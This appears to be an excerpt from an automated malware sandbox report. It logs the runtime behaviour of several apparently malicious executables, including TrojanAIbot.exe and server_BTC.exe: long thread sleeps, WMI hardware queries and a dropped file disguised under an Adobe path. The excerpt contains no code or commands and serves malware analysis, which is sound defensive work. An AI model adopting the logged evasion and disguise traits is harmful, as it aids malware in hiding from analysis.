                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2840000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 1790000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 3390000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 30D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 3050000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 3220000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 5220000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: FA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 2C60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 11C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 17A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 3270000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 5270000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 4722
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 5080
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5417
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 674
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window / User API: threadDelayed 4989
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window / User API: threadDelayed 4798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 524
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 2214
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 3850
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 5961
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF API coverage: 10.0 %
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep count: 38 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -35048813740048126s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -99848s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 936 Thread sleep count: 4722 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -99723s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -99602s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -99493s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -99378s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -99257s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -99138s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -99026s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -98869s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -98766s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 936 Thread sleep count: 5080 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -98641s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -98208s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -98066s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -97860s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -97666s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -97538s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -97427s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -97302s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -97183s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -97066s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -96934s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -96809s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -96701s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -96590s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -96478s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -96357s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -96247s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -96103s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -95994s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -95870s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -95423s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -95278s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -95168s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -95046s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -94892s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -94763s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -94654s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -94544s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -94435s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800 Thread sleep time: -94326s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -94216s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -94106s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -93992s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -93884s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -93778s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -93669s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99953s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99843s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99623s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99071s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98873s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98547s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98437s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98327s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 5656Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2136 Thread sleep count: 5417 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3200 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2136 Thread sleep count: 674 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 2788 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5932 Thread sleep time: -299340000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5932 Thread sleep time: -287880000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6672 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 828 Thread sleep count: 524 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -99872s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 828 Thread sleep count: 2214 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -99757s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -99632s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -99510s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -99408s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -99283s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -99158s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -99033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -98899s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -98791s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -98669s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -98559s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -98452s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -98337s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -98228s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -98106s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -97941s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -97242s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -97109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -96977s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -96797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5168 Thread sleep time: -96593s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 3040 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -99760s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -99030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98867s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98749s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98630s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98494s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98381s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98243s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98132s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98009s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97850s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97739s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97602s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97483s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97364s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97227s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97115s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -96987s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -96852s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -96690s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -96462s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -96352s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -96243s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -96133s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -96024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -95914s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -95801s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -95680s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -95571s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -95458s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -95337s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -99953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -99844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -99734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -99625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -99515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -99406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -99297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -99187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -99078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98511s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -98062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97843s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97624s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2052 Thread sleep time: -97281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 2216 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 2792 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\x.exe Code function: 0_2_02EC5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02EC5908
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99848
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99723
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99602
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99493
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99378
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99257
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99138
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99026
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98869
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98766
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98641
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98208
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98066
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97860
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97666
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97538
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97427
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97302
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97183
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97066
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96934
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96809
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96701
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96590
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96478
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96357
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96247
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96103
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95994
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95870
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95423
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95278
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95168
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95046
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94892
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94763
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94654
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94544
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94435
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94326
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94216
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94106
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93992
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93884
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93778
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93669
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99953
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99843
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99734
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99623
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99071
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98873
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98765
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98656
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98547
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98437
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98327
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
